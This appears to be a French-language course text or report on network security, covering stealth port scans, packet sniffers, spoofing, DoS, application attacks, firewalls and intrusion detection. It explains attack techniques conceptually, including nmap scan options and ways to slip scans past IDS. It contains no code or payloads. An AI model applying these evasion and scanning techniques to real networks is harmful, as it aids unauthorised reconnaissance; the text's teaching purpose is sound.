L'attaquant envoie donc des paquets TCP forgs avec des flags divers de type FIN, URG, PSH etc,
mais pas de SYN bien videment pour ne pas tre logu par le firewall. Le principe de cette mthode est
de ne pas envoyer de SYN, mais un autre paquet comme FIN, URG, PSH et d'attendre comme toujours la
rponse.
Conformment la RFC, le schma suivant montre que le port de la cible est ferm :
1- FN-URG-PSH-NULL
2- RST-ACK
Cible A
Pirate Z
Le schma suivant montre que le port de la cible est ouvert :
Voici un outil fonctionnant sur la mthode inverse TCP flag :
Nmap utilise cette mthode si on lui indique les options -sF (FIN flag) ou -sN (NULL = pas de flag
TCP)
2.3 - Le scan furtif :
La dfinition d'un scan "furtif" a vari travers les dernires annes. A l'origine, ce terme tait utilis
pour dcrire une technique qui vitait les IDS et les enregistrements (logs), maintenant connu
comme un scan "semi-ouvert". Cependant, actuellement, le scan furtif est considr comme tant tout
scan tant concern par quelques uns des points suivants:
paramtrant des drapeaux individuels (ACK, FIN, RST, ..)
faisant intervenir des drapeaux NULL.
faisant intervenir tous les drapeaux.
passant travers les filtres, pare-feux, routeurs.
apparat comme du traffic rseau fortuit.
taux de paquets parpills vari.
Le scan dcrit dans le paragraphe suivant est un exemple de scan furtif:
TCP fragmentation
La fragmentation TCP n'est pas une mthode de scan en tant que tel, c'est une technique qui rend
trs discret le scan. En effet, le but est de fragmenter l'en-tte TCP en petits fragments. Le rassemblage IP
du ct serveur provoque souvent des rsultats non prvisibles et anormaux.
Beaucoup d'htes sont incapables d'analyser et de rassembler les minis paquets et ainsi peut causer des
crashs, des redmarrages. Ces minis paquets peuvent tre potentiellement bloqus par la fragmentation IP,
mis en attente dans le noyau ou pouvant tre pris en compte par une rgle de pare-feu.
Depuis que la plupart des systmes de dtection d'intrusion (IDS) utilisent des mcanismes bass sur des
signatures pour identifier les scans, la fragmentation est trs souvent capable de gagner sur ce type de
filtrage, et le scan ne sera donc pas dcouvert.
3 - Scan de ports UDP
Le protocole UDP ne requiert pas de connexions.
Il consiste envoyer des paquets UDP sur les 65535 ports et attendre un "ICMP destination port
unreachable" qui signifie que le port est ferm, inaccessible ou que la machine est hors service. La plupart
des rseaux filtrent les messages ICMP, il est donc souvent difficile d'valuer quel service UDP est
accessible par un simple scan de port. Le schma ci-dessous montre que le port est ouvert.
Et le schma ci-dessous montre que le port est ferm :
Voici un outil fonctionnant sur le scan de port UDP :
Nmap utilise cette mthode si on lui indique l'option -sU.
Sous Windows, SuperScan le permet aussi.
4 - Comment se protger contre les diffrents types de scan
Voici quelques conseils pour filtrer voire contr les scans.
Filtrer les messages ICMP auprs du rseau externe, par l'intermdiaire des routeurs et firewalls.
Cela forcera le pirate employer de vritables balayages de port de TCP pour tracer votre rseau
correctement, ce qui a pour avantage d'tre logu par les IDS.
Filtrer les messages ICMP de type 3 (destination port unreachable) auprs des routeurs et firewalls
pour empcher le balayage UDP et le firewalking d'tre efficace.
Configurer correctement vos firewalls de sorte qu'ils puissent identifier les balayages. Il y a
beaucoup d'outils tels que Portsentry qui peut identifier les scans et peut ignorer les paquets
provenant d'un IP donne pendant une priode donne.
Evaluer comment votre firewall gre les paquets fragments IP.
S'assurer que vos routeurs et firewalls ne peuvent pas tre outrepasss en utilisant des ports
spcifiques ou des techniques de modifications d'adresse (spoofing).
Dans tous les cas, le firewall doit avoir le dernier patch install, et avoir des rgles d'anti-spoofing
bien dfinis (pour empcher les IP spoofs).
Utiliser dans la mesure du possible des serveurs proxy. Mais a ne change pas que l'on peut
scanner les Proxy.
zo
LES ANALYSEURS
1 Dfinition :
Un analyseur est un programme qui capte tout le trafic qui circule dans le rseau, il intercepte
toutes les trames Ethernet qui transitent dans le rseau et spcialement celle qui ne nous sont pas
destines.
2 - Types danalyseurs :
Il y a deux types danalyseurs :
2 1 Analyseur passif :
Il suffit de configurer l'interface ou carte rseau en mode promiscuous (si celle-ci le supporte) pour
que la carte rseau laisse voir toutes les trames Ethernet, y compris celles dont le destinataire est diffrent
de l'adresse MAC de l'interface.
On observe ainsi le trafic rseau de son segment mais l'utilisation de switch rend inefficace cette mthode.
D'autres moyens, actifs, sont alors ncessaires pour contourner cette difficult.
2 2 Analyseur actif :
De faon recevoir les trames qui ne nous sont pas adresses, il faut dtourner le trafic vers notre
machine. Diffrentes techniques fonctionnant autour du protocole ARP ont pour tche de dtourner le
trafic.
3 - Winpcap :
winpcap est une architecture dveloppe pour la capture de paquets et lanalyse de rseau pour les
plateformes Win32. On parle darchitecture et non pas de librairie parce que la capture de paquets est un
mcanisme de bas niveau qui require une stricte interaction avec ladaptateur rseau et le systme
dexploitation, en particulier son implmentation rseau.
Le schma ci-contre reprsente les composants de winpcap.
Premirement : la systme de capture besoin doutre
passer la pile du protocole afin daccder aux donnes
brutes qui transitent dans le rseau, ceci ncessite une
partie qui sexcute dans le noyau du systme
dexploitation, interagissant directement avec linterface
rseau. Cette partie est trs dpendante du systme, dans la
solution winpcap, elle a tait ralise comme un driver
dinterface nomm : Netgroup Packet Filter NPF,
actuellement il existe plusieurs versions de ce driver pour
Windows 95, Windows NT, Windows ME, Windows NT
4, Windows 2000, et Windows XP.
Ces drivers offre des fonctionnalits de base comme la
capture de paquets et linjection.
Et dautres plus avances comme la programmation des systmes de filtrage, et les moniteurs de
surveillances :
La premire peut tre employe pour limiter une session de capture un sous-ensemble du trafic de rseau
(par exemple il est possible de capturer seulement le trafic ftp gnr par un client particulier), et la
Application
Wpcap.dll
NPF
Device driver
Packet.dll
Niveau utilisateur
Niveau noyau
Rseau
Paquets
z
seconde fournit un puissant et simple mcanisme pour obtenir des statistiques sur le trafic (par exemple il
est possible d'obtenir la charge de rseau ou la quantit de donnes changes entre deux clients).
Deuximement : Le systme de capture doit exporter une interface que les applications niveau utilisateur
emploieront pour tirer profit des dispositifs fournis par le driver noyau. WinPcap fournit deux
bibliothques diffrentes : packet.dll et wpcap.dll.
Le premier offre une API de bas niveau qui peut tre employ pour accder directement aux fonctions du
driver, avec une interface de programmation indpendante de l'OS de Microsoft.
Le second exporte un ensemble plus puissant de primitives niveau lev de capture qui sont compatibles
avec libpcap, la bibliothque bien connue de capture d'Unix. Ces fonctions laissent capturer des paquets
d'une manire indpendante du matriel fondamental de rseau et du logiciel d'exploitation.
LES PRINCIPALES ATTAQUES
Pour protger un rseau, il faut connatre les principales attaques qui peuvent laffecter.
1 - Les attaques sur rseau :
Ce type dattaque se base principalement sur des failles lies aux protocoles ou leur
implmentation.
1.1 - IP Spoofing :
But : usurper ladresse IP dune autre machine.
Finalit : se faire passer pour une autre machine en truquant les paquets IP. Cette technique peut tre utile
dans le cas dauthentifications bases sur une adresse IP (services tels que rlogin ou ssh par exemple).
Droulement : il existe des utilitaires qui permettent de modifier les paquets IP ou de crer ses propres
paquets (ex : hping2). Grce ces utilitaires, il est possible de spcifier une adresse IP diffrente de celle
que lon possde, et ainsi se faire passer pour une autre machine .
Cependant, ceci pose un problme : en spcifiant une adresse IP diffrente de notre machine, nous ne
recevrons pas les rponses de la machine distante, puisque celle-ci rpondra ladresse spoofe. Il existe
toutefois deux mthodes permettant de rcuprer les rponses :
Source routing : technique consistant placer le chemin de routage directement dans le paquet IP.
Cette technique ne fonctionne plus de nos jours, les routeurs rejetent cette option.
Reroutage : cette technique consiste envoyer des paquets RIP aux routeurs afin de modifier les
tables de routage. Les paquets avec ladresse spoofe seront ainsi envoys aux routeurs contrls par le
pirate et les rponses pourront tre galement reues par celui-ci.
1.2 - ARP Spoofing (ou ARP Redirect):
But : rediriger le trafic dune machine vers une autre.
Finalit : grce cette redirection, une personne mal intentionne peut se faire passer pour une autre. De
plus, le pirate peut rerouter les paquets quil reoit vers le vritable destinataire, ainsi lutilisateur usurp
ne se rendra compte de rien. La finalit est la mme que lIP spoofing mais on travaille ici au niveau de la
couche liaison de donnes.
Droulement : pour effectuer cette usurpation, il faut corrompre le cache ARP de la victime. Ce qui
signifie quil faut lui envoyer des trames ARP en lui indiquant que ladresse IP dune autre machine est la
sienne. Les caches ARP tant rgulirement vids, il faudra veiller maintenir lusurpation.
zz
1.3 - DNS Spoofing :
But : fournir de fausses rponses aux requtes DNS, c'est--dire indiquer une fausse adresse IP
pour un nom de domaine.
Finalit : rediriger, leur insu, des Internautes vers des sites pirates. Grce cette fausse redirection,
lutilisateur peut envoyer ses identifiants en toute confiance par exemple.
Droulement : il existe deux techniques pour effectuer cette attaque.
DNS Cache Poisoning : les serveurs DNS possdent un cache permettant de garder pendant un
certain temps la correspondance entre un nom de machine et son adresse IP. Le DNS Cache
Poisoning consiste corrompre ce cache avec de fausses informations. Ces fausses informations
sont envoyes lors dune rponse dun serveur DNS contrl par le pirate un autre serveur DNS,
lors de la demande de ladresse IP dun domaine (ex : www.ledomaine.com). Le cache du serveur
ayant demand les informations est alors corrompu.
DNS ID Spoofing : pour communiquer avec une machine, il faut son adresse IP. On peut toutefois
avoir son nom, et grce au protocole DNS, nous pouvons obtenir son adresse IP. Lors dune
requte pour obtenir ladresse IP partir dun nom, un numro didentification est plac dans la
trame afin que le client et le serveur puissent identifier la requte. Lattaque consiste ici
rcuprer ce numro didentification (en sniffant le rseau) lors de la communication entre un
client et un serveur DNS, puis, envoyer des rponses falsifies au client avant que le serveur DNS
lui rponde.
1.4 - Fragments attacks :
But : le but de cette attaque est de passer outre les protections des quipements de filtrage IP.
Finalit : en passant outre les protections, un pirate peut par exemple sinfiltrer dans un rseau pour
effectuer des attaques ou rcuprer des informations confidentielles.
Droulement : deux types dattaque sur les fragments IP peuvent tre distingus.
Fragments overlapping : quand un message est mis sur un rseau, il est fragment en plusieurs paquets
IP. Afin de pouvoir reconstruire le message, chaque paquet possde un offset. Le but de lattaque est de
raliser une demande de connexion et de faire chevaucher des paquets en spcifiant des offsets incorrects.
La plupart des filtres analysant les paquets indpendamment, ils ne dtectent pas lattaque. Cependant,
lors de la dfragmentation, la demande de connexion est bien valide et lattaque a lieu.
Tiny fragments : le but de lattaque est de fragmenter une demande de connexion sur deux paquets IP : le
premier paquet de taille minimum (68 octets selon la RFC du protocole IP) ne contient que ladresse et le
port de destination. Le deuxime paquet contient la demande effective de connexion TCP. Le premier
paquet est accept par les filtres puisquil ne contient rien de suspect. Quand le deuxime paquet arrive,
certains filtres ne le vrifient pas pensant que si le premier paquet est inoffensif, le deuxime lest aussi.
Mais lors de la dfragmentation sur le systme dexploitation, la connexion stablit
De nos jours, une grande majorit des firewalls sont capables de dtecter et stopper ce type dattaques.
1.5 - TCP Session Hijacking :
But : le but de cette attaque est de rediriger un flux TCP afin de pouvoir outrepasser une protection
par mot de passe.
Finalit : le contrle d'authentification s'effectuant uniquement l'ouverture de la session, un pirate
russissant cette attaque parvient prendre possession de la connexion pendant toute la dure de la
session.
Droulement : dans un premier temps, le pirate doit couter le rseau, puis lorsquil estime que
lauthentification a pu se produire (dlai de n secondes par exemple), il dsynchronise la session entre
lutilisateur et le serveur. Pour ce faire, il construit un paquet avec, comme adresse IP source, celle de la
machine de lutilisateur et le numro d'acquittement TCP attendu par le serveur. En plus de
z_
dsynchroniser la connexion TCP, ce paquet permet au pirate d'injecter une commande via la session
pralablement tablie.
2 - Le dni de service :
Les attaques de type dni de service ont pour but de consommer toutes les ressources dun rseau
cible pour empcher son fonctionnement normal. Ces attaques sont opres par des groupes qui
conjuguent leurs efforts pour le plaisir de nuire mais galement par des organisations mafieuses qui
demandent des ranons. Parmi un trs grand nombre dattaques en dni de service on peut citer les
suivantes :
2.1 - Les TCP SYN flood :
Qui exploitent le mode connect de TCP, pour tablir une connexion, une machine source met un
paquet SYN auquel la machine destination rpond par un paquet SYN-ACK. Dans une situation normale,
la machine source met alors un paquet ACK et la connexion est tablie. Le schma dune attaque TCP
SYN est de supprimer la dernire tape (envoi du paquet ACK), la machine cible lattend alors pendant un
certain temps. En rptant lopration grande chelle, on sature la machine cible en lui faisant atteindre
le nombre maximum de connexion TCP quelle peut supporter : elle ne peut plus fonctionner.
2.2 - UDP Flooding :
Le trafic UDP est prioritaire sur TCP. Le but est donc denvoyer un grand nombre de paquets
UDP, ce qui va occuper toute la bande passante et ainsi rendre indisponible toutes les connexions TCP.
Exemple : faire une requte chargen (port 19 / service de gnration de caractres) une machine en
spoofant l'adresse et le port source, pour rediriger vers echo (port 7 / service qui rpte la chane de
caractres reue) d'une autre machine.
2.3 - Le ping of death :
Dont le principe est denvoyer des paquets ICMP dont la taille est suprieure la taille maximale
dun paquet IP, certains quipements se bloquent alors (ils sont en voie de disparition).
2.4 - Smurfling :
Le pirate fait des requtes ICMP ECHO des adresses de broadcast en spoofant l'adresse source
(en indiquant ladresse de la machine cible). Cette machine cible va recevoir un nombre norme de
rponses, car toutes les machines vont lui rpondre, et ainsi utiliser toute sa bande passante.
2.5 - Dni de service distribu :
Le but est ici de reproduire une attaque normale grande chelle. Pour ce faire, le pirate va tenter
de se rendre matre dun nombre important de machines. Grce des failles (buffer overflows, failles
RPC) il va pouvoir prendre le contrle de machines distance et ainsi pouvoir les commander sa guise.
Une fois ceci effectu, il ne reste plus qu donner lordre dattaquer toutes les machines en mme
temps, de manire ce que lattaque soit reproduite des milliers dexemplaires. Ainsi, une simple
attaque comme un SYN Flooding pourra rendre une machine ou un rseau totalement inaccessible.
3 - Les attaques applicatives :
Les attaques applicatives se basent sur des failles dans les programmes utiliss, ou encore des
erreurs de configuration. Toutefois, comme prcdemment, il est possible de classifier ces attaques selon
leur provenance.
z
3.1 - Les problmes de configuration
Il est trs rare que les administrateurs rseaux configurent correctement un programme. En gnral,
ils se contentent dutiliser les configurations par dfaut. Celles-ci sont souvent non scurises afin de
faciliter lexploitation du logiciel (ex : login/mdp par dfaut dun serveur de base de donnes).
De plus, des erreurs peuvent apparatre lors de la configuration dun logiciel. Une mauvaise configuration
dun serveur peut entraner laccs des fichiers importants, ou mettant en jeu lintgrit du systme
dexploitation. Cest pourquoi il est important de bien lire les documentations fournies par les
dveloppeurs afin de ne pas crer de failles.
3.2 - Les bugs
Lis un problme dans le code source, ils peuvent amener lexploitation de failles. Il nest pas
rare de voir lexploitation dune machine suite une simple erreur de programmation. On ne peut
toutefois rien faire contre ce type de problmes, si ce nest attendre un correctif de la part du dveloppeur.
3.3 - Les buffer overflows
Les buffers overflows, ou dpassement de la pile, sont une catgorie de bug particulire. Issus
dune erreur de programmation, ils permettent lexploitation dun shellcode3 distance. Ce shellcode
permettra une personne mal intentionne dexcuter des commandes sur le systme distant, pouvant aller
jusqu sa destruction. Lerreur de programmation est souvent la mme : la taille dune entre nest pas
vrifie et lente est directement copie dans un buffer dont la taille est infrieure la taille de lentre.
On se retrouve donc en situation de dbordement, et lexploitant peut ainsi accder la mmoire.
3.4 - Les scripts
Principalement web (ex : Perl, PHP, ASP), ils sexcutent sur un serveur et renvoie un rsultat au
client. Cependant, lorsquils sont dynamiques (i.e. quils utilisent des entres saisies par un utilisateur),
des failles peuvent apparatre si les entres ne sont pas correctement contrles. Lexemple classique est
lexploitation de fichier distance, tel que laffichage du fichier mot de passe du systme en remontant
larborescence depuis le rpertoire web.
3.5 - Les injections SQL
Tout comme les attaques de scripts, les injections SQL profitent de paramtres dentre non
vrifis. Comme leur nom lindique, le but des injections SQL est dinjecter du code SQL dans une
requte de base de donnes. Ainsi, il est possible de rcuprer des informations se trouvant dans la base
(exemple : des mots de passe) ou encore de dtruire des donnes.
4 - Man in the middle
Moins connue, mais tout aussi efficace, cette attaque permet de dtourner le trafic entre deux
stations. Imaginons un client C communiquant avec un serveur S. Un pirate peut dtourner le trafic du
client en faisant passer les requtes de C vers S par sa machine P, puis transmettre les requtes de P vers
S. Et inversement pour les rponses de S vers C. Totalement transparente pour le client, la machine P joue
le rle de proxy. Il accdera ainsi toutes les communications et pourra en obtenir les informations sans
que lutilisateur.
5 - RSEAU SANS FIL
Maintenant, pour relier les ordinateurs au rseau de lentreprise, il est possible dutiliser la
technologie sans fil de Wireless Lan (802.11) qui est bien pratique pour les postes qui sont en dplacement
constant, mais linconvnient est que le rseau de lentreprise ne se limite plus physiquement au mur
extrieur de celle-ci mais est la porte des ondes mises par cette technologie, qui sont une frquence
z
de 2.4 GHz. Cette frquence est proche de celle utilise par la technologie GSM et on sait trs bien quelle
est utilisable lintrieur comme lextrieur des habitations. Donc, en ayant des metteurs de rseau sans
fil lintrieur, il est possible pour une personne possdant un ordinateur portable avec une carte Wireless
de se connecter au rseau de lentreprise. Cette personne se trouve physiquement lextrieur de
lentreprise mais malheureusement elle est dans le rseau de lentreprise. Il est possible par des logiciels,
de dtecter les ondes Wireless, comme lillustre la Figure 2.2. Cette dtection a t effectue dans le
laboratoire dinformatique de linstitut, le signal tant trs faible mais suffisant pour se connecter. Par
consquent, il ne faut pas oublier dactiver lencryptions de donnes, ce qui tait fais par lquipe rseau
de linstitut.
Figure 2.2 dtection des ondes wireless
Malheureusement le protocole dencryptions de donnes WEP nest pas fiable, celui-ci utilise la mme cl
secrte (connue au pralable par lAP et les stations lors de la configuration) pour toutes les transmissions.
Du fait que cest une cl statique fixe, des programmes comme airsnort peuvent la dcouvrir en analysant
le trafic.
6 - Virus et Trojan:
6.1 - Le virus:
Le virus est un programme dont le seul but est de consommer ou de paralyser des ressources
systme. Le virus sauto duplique pour mieux infecter le systme, il se propage en infectant tour tour les
fichiers. Les effets dune contamination varient : fichiers effacs, disque dur format, saturation des
disques, et modification du MBR. La grande majorit dentre eux existent sur les plates-formes Microsoft,
ils infectent en particulier les fichiers COM ou EXE. De plus, de nouvelles formes sont apparues comme
les macrovirus qui attaquent les fichiers de donnes (Word ou Excel).
Les systmes UNIX ne sont pas pargns, Les administrateurs UNIX doivent faire face des virus comme
Winux. Nanmoins, la gestion des droits sous UNIX se rvle tre un facteur limitant pour la propagation
de virus.
z6
Les virus sont de plus en plus volus, ils peuvent sauto modifier pour chapper une ventuelle
dtection (virus polymorphes). Dautres types peuvent tenter de leurrer le systme en sinstallant dans des
secteurs dfectueux ou non utiliss (virus furtifs).
6.2 - Les vers:
Les vers sont du mme type que les virus, sauf quils nutilisent pas ncessairement un fichier pour
se propager. Ils sont aussi capables de se dupliquer et de se dplacer au travers dun rseau informatique.
Le plus clbre des vers date de 1988, cest le vers de Morris qui paralysa des milliers de micro-ordinateur
travers le Web.
Les vers actuels se propagent principalement grce la messagerie (et notamment par le client de
messagerie Outlook) grce des fichiers attachs contenant des instructions permettant de rcuprer
l'ensemble des adresses de courrier contenues dans le carnet d'adresse et en envoyant des copies d'eux-
mmes tous ces destinataires.
6.3 - Cheval de Troy:
Un cheval de Troie ou troyen est un programme cach dans un autre qui excute des commandes
sournoises, et qui gnralement donne un accs l'ordinateur sur lequel il est excut en ouvrant une porte
drobe (en anglais backdoor).
Une fois sur le systme, les troyens se lient des applications, modifient la base de registre de manire
tre excuts ds le lancement du systme. Ils sont actifs en permanence et sont difficilement ou pas
dtectable par le systme. En allant regarder dans le gestionnaire de tches, celui-ci naffichera pas ou
affichera un nom de programme banal, comme : note.exe, winamp34.exe.
6.4 - Les bombes logiques:
Les bombes logiques sont aussi nfastes que les virus ou les vers et sont la cause de dgts
similaires. La diffrence est que la bombe logique a besoin dun dtonateur pour sactiver, cest-à-dire
quelle attend une date ou une action bien prcise de lutilisateur pour exploser.
La bombe logique Tchernobyl s'est active le 26 avril 1999, jour du 13me anniversaire de la catastrophe
nuclaire
LES FIREWALLS ou PAREFEUX
1 - Pourquoi un firewall :
De nos jours, toutes les entreprises possdant un rseau local possdent aussi un accs Internet,
afin d'accder la masse d'information disponible sur le rseau des rseaux. Ouvrir l'entreprise vers le
monde signifie aussi laisser place ouverte aux trangers pour essayer de pntrer le rseau local de
l'entreprise, et y accomplir des actions douteuses.
Le firewall propose donc un vritable contrle sur le trafic rseau de l'entreprise. Il permet
d'analyser, de scuriser et de grer le trafic rseau, et ainsi d'utiliser le rseau de la faon pour laquelle il a
t prvu et sans l'encombrer avec des activits inutiles, et d'empcher une personne sans autorisation
d'accder ce rseau de donnes.
2 - Les diffrents types de filtrages :
2.1 - Le filtrage simple de paquet (Stateless) :
2.1.1 - Le principe
C'est la mthode de filtrage la plus simple, elle opre au niveau de la couche rseau et transport du modle
OSI. Cela consiste accorder ou refuser le passage de paquet d'un rseau un autre en se basant sur:
z;
L'adresse IP Source/Destination.
Le numro de port Source/Destination.
Et bien sur les protocoles de niveau 3 ou 4.
Cela ncessite de configurer le Firewall ou le routeur par des rgles de filtrages, gnralement appeles
des ACL (Access Control Lists).
2.1.2 - Les limites
Le premier problme vient du fait que l'administrateur rseau est rapidement contraint autoriser
un trop grand nombre d'accs, ce qui laisse beaucoup de choix un ventuel pirate.
2.2 - Le filtrage de paquet avec tat (Statefull) :
2.2.1 - Le Principe
L'amlioration par rapport au filtrage simple, est la conservation de la trace des sessions et des
connexions dans des tables d'tats internes au Firewall. Le Firewall prend alors ses dcisions en fonction
des tats de connexions, et peut ragir dans le cas de situations protocolaires anormales. Ce filtrage permet
aussi de se protger face certains types d'attaques DoS.
2.2.2 - Les limites
Une fois que l'accs un service est autoris, il n'y a aucun contrle effectu sur les requtes et
rponses des clients et serveurs. Il y a aussi les protocoles maisons utilisant plusieurs flux de donnes qui
ne passeront pas, puisque le systme de filtrage dynamique n'aura pas connaissance du protocole.
2.3 - Le filtrage applicatif (ou pare-feu de type proxy) :
2.3.1 - Le principe
Le filtrage applicatif est comme son nom l'indique ralis au niveau de la couche application. Pour
cela, il faut bien sr pouvoir extraire les donnes du protocole de niveau 7 pour les tudier. Les requtes
sont traites par des processus ddis, par exemple une requte de type HTTP sera filtre par un processus
proxy HTTP. Le pare-feu rejettera toutes les requtes qui ne sont pas conformes aux spcifications du
protocole. (Figure : 2.1)
Figure 2.1 : Fonctionnement dun Pare feux applicatif
z8
2.3.2 - Les limites
Le premier problme qui se pose est la finesse du filtrage ralis par le proxy. Il est extrmement
difficile de pouvoir raliser un filtrage qui ne laisse rien passer, vu le nombre de protocoles de niveau 7.
En outre le fait de devoir connatre les rgles protocolaires de chaque protocole filtr pose des problmes
d'adaptabilit de nouveaux protocoles ou des protocoles maisons.
Mais il est indniable que le filtrage applicatif apporte plus de scurit que le filtrage de paquet avec tat,
mais cela se paie en performance. Ce qui exclut l'utilisation d'une technologie 100 % proxy pour les
rseaux gros trafic au jour d'aujourd'hui.
3 - Les diffrents types de firewall :
3.1 - Les firewall bridge :
Comme son nom lindique, ce firewall est invisible sur le rseau, il a la fonction dun cble rseau
avec un filtrage en plus, son principe et que ses interfaces ne possdent pas dadresses IP, il ne rpond pas
aux requtes ARP, et il traite et fait transiter les paquets sans leur apporter des modifications, et cest ce
qui le rend invisible, et indtectable par un hacker lambda. Dans la plupart des cas, ces derniers ont une
interface de configuration spare.
Ces firewalls se trouvent typiquement sur les switchs.
3.1.1 - Avantages
Impossible de l'viter (les paquets passeront par ses interfaces).
Peu coteux
3.1.2 - Inconvnients
Possibilit de le contourner (il suffit de passer outre ses rgles).
Configuration souvent contraignante
3.2 - Les firewalls matriels :
Ils se trouvent souvent sur des routeurs achets dans le commerce par de grands constructeurs comme
Cisco ou Nortel. Intgrs directement dans la machine. Leur configuration est souvent relativement ardue,
mais leur avantage est que leur interaction avec les autres fonctionnalits du routeur est simplifie de par
leur prsence sur le mme quipement rseau. Souvent relativement peu flexibles en terme de
configuration, ils sont aussi peu vulnrables aux attaques, l'accs leur code est assez difficile, et le
constructeur a eu toute latitude pour produire des systme de codes signs afin d'authentifier le logiciel.
Ce systme n'est implant que dans les firewalls haut de gamme. Son administration est souvent plus aise
que les firewall bridges. Leur niveau de scurit est de plus trs bon, sauf dcouverte de faille ventuelle
comme tout firewall. Cela dit les mises jour dpendent du constructeur, et si une possibilit nous
intresse sur une autre parque, elle nous serait inaccessible, donc il faut faire le bon choix selon nos
besoins.
3.3 - Les firewalls logiciels :
3.3.1 - Les firewalls personnels
Ils sont assez souvent commerciaux et ont pour but de scuriser un ordinateur particulier, et non
pas un groupe d'ordinateurs. Souvent payants, ils peuvent tre contraignants et quelque fois trs peu
scuriss. En effet, ils s'orientent plus vers la simplicit d'utilisation plutt que vers l'exhaustivit, afin de
rester accessible l'utilisateur final.
3.3.2 - Les firewalls plus srieux
Tournant gnralement sous linux, car cet OS offre une scurit rseau plus leve et un contrle plus
adquat, ils ont gnralement pour but d'avoir le mme comportement que les firewalls matriels des
routeurs.
z
3.3.2.1 - Avantages
Personnalisables
Niveau de scurit trs bon
3.3.2.2 - Inconvnients
Ncessite une administration systme supplmentaire
Ces firewalls logiciels ont nanmoins une grande faille : ils n'utilisent pas la couche bas rseau. Il suffit
donc de passer outre le noyau en ce qui concerne la rcupration de ces paquets, en utilisant une librairie
spciale, pour rcuprer les paquets qui auraient t normalement dropps par le firewall. Nanmoins,
cette faille induit de s'introduire sur l'ordinateur en question pour y faire des modifications... chose qui
induit dj une intrusion dans le rseau, ou une prise de contrle physique de l'ordinateur, ce qui est dj
synonyme d'inefficacit de la part du firewall.
LES SYSTEMES DE DETECTION DINTRUSION: IDS
1 - Dfinition :
Un systme de dtection dintrusion peut tre compar une alarme domestique contre les
cambrioleurs, si une tentative dintrusion malveillante est dcouverte, il peut soit prendre lui-mme des
mesures correctives, soit alerter un systme administratif pour que l'administrateur rgle le problme.
2 - Types dIDS :
On peut distingues quatre types dIDS :
2.1 - IDS bas sur le rseau :
LIDS bas sur le rseau utilise les paquets bruts du rseau comme sources de donnes. Il utilise
typiquement une interface rseau en mode discret qui coute et analyse tout le trafic en temps rel lors de
son parcours sur le rseau. Un premier filtre est normalement appliqu pour dterminer quel trafic doit
tre analys pour un module de reconnaissance dattaque de celui qui doit tre ignor. Ce premier niveau
aide la performance de lIDS et sa prcision pour rejeter le trafic qui nest pas dangereux.
2.2 IDS bas sur lhte :
Ces IDS sont utiliss pour la dtection des intrusions au niveau de lhte, ils utilisent pour cela les
fichiers journaux. Ds quil y a un changement dans ces fichiers, lIDS compare linformation avec ce qui
est configur dans la politique de scurit en place et rpond alors en accord avec le changement. Une
mthode de ce type dIDS est de surveiller lactivit des logs en temps rel, tandis que dautres solutions
consistent faire tourner des processus qui vrifient priodiquement les logs pour les nouvelles
informations et les changements.
2.3 IDS bas sur la pile :
Ce type dIDS travaille avec la pile TCP/IP, permettant aux paquets dtre analyss tandis quils
traversent les couches du modles OSI en montant. Cette analyse permet de rejeter les paquets hors de la
pile avant quils ne soient traits par lOS ou la couche application. De plus, ces IDS peuvent analyser le
trafic du rseau entrant et sortant sur le systme.
2.4 Les systmes de dtection dintrusions hybrides :
Gnralement utiliss dans un environnement dcentralis, ils permettent de runir les
informations de diverses sondes places sur le rseau. Leur appellation hybride provient du fait quils
sont capables de runir aussi bien des informations provenant dun systme HIDS quun NIDS.
_o
Lexemple le plus connu dans le monde Open-Source est Prelude. Ce framework permet de stocker dans
une base de donnes des alertes provenant de diffrents systmes relativement varis. Utilisant Snort
comme NIDS, et dautres logiciels tels que Samhain en tant que HIDS, il permet de combiner des outils
puissants tous ensemble pour permettre une visualisation centralise des attaques.
3 Les systmes de prvention dintrusions (IPS) :
Dfinition : ensemble de composants logiciels et matriels dont la fonction principale est
dempcher toute activit suspecte dtecte au sein dun systme.
Contrairement aux IDS simples, les IPS sont des outils aux fonctions actives , qui en plus de dtecter
une intrusion, tentent de la bloquer. Cependant, les IPS ne sont pas la solution parfaite comme on pourrait
le penser.
Plusieurs stratgies de prvention dintrusions existent :
host-based memory and process protection : surveille l'excution des processus et les tue s'ils
ont l'air dangereux (buffer overflow). Cette technologie est utilise dans les KIPS (Kernel Intrusion
Prevention System) que nous dcrivons un peu plus loin.
session interception / session sniping : termine une session TCP avec la commande TCP Reset :
RST . Ceci est utilis dans les NIPS (Network Intrusion Prevention System).
gateway intrusion detection : si un systme NIPS est plac en tant que routeur, il bloque le trafic
; sinon il envoie des messages d'autres routeurs pour modifier leur liste d'accs.
Un IPS possde de nombreux inconvnients :
Le premier est quil bloque toute activit qui lui semble suspecte. Or, il est impossible dassurer une
fiabilit 100% dans lidentification des attaques. Un IPS peut donc malencontreusement bloquer du
trafic inoffensif ! Par exemple, un IPS peut dtecter une tentative de dni de service alors quil sagit
simplement dune priode charge en trafic. Les faux positifs sont donc trs dangereux pour les IPS.
Le deuxime inconvnient est quun pirate peut utiliser sa fonctionnalit de blocage pour mettre hors
service un systme. Prenons lexemple dun individu mal intentionn qui attaque un systme protg par
un IPS, tout en spoofant son adresse IP. Si ladresse IP spoofe est celle dun noeud important du rseau
(routeur, service Web, ...), les consquences seront catastrophiques. Pour palier ce problme, de nombreux
IPS disposent des white lists , cest--dire des listes dadresses rseaux quil ne faut en aucun cas
bloquer.
Le troisime inconvnient et non le moindre : un IPS est peu discret. En effet, chaque blocage
dattaque, il montre sa prsence. Cela peut paratre anodin, mais si un pirate remarque la prsence dun
IPS, il tentera de trouver une faille dans celui-ci afin de rintgrer son attaque... mais cette fois en passant
inaperu.
Voil pourquoi les IDS passifs sont souvent prfrs aux IPS. Cependant, il est intressant de noter que
plusieurs IDS (Ex : Snort, RealSecure, Dragon, ...) ont t dots dune fonctionnalit de raction
automatique certains types dattaques.
3.1 - Les systmes de prvention dintrusions kernel (KIDS/KIPS)
Lutilisation dun dtecteur dintrusions au niveau noyau peut savrer parfois ncessaire pour
scuriser une station.
Prenons lexemple dun serveur web, sur lequel il serait dangereux quun accs en lecture/criture dans
dautres rpertoires que celui consultable via http, soit autoris. En effet, cela pourrait nuire lintgrit
du systme. Grce un KIPS, tout accs suspect peut tre bloqu directement par le noyau, empchant
ainsi toute modification dangereuse pour le systme.
_
Le KIPS peut reconnatre des motifs caractristiques du dbordement de mmoire, et peut ainsi interdire
lexcution du code. Le KIPS peut galement interdire lOS dexcuter un appel systme qui ouvrirait un
shell de commandes.
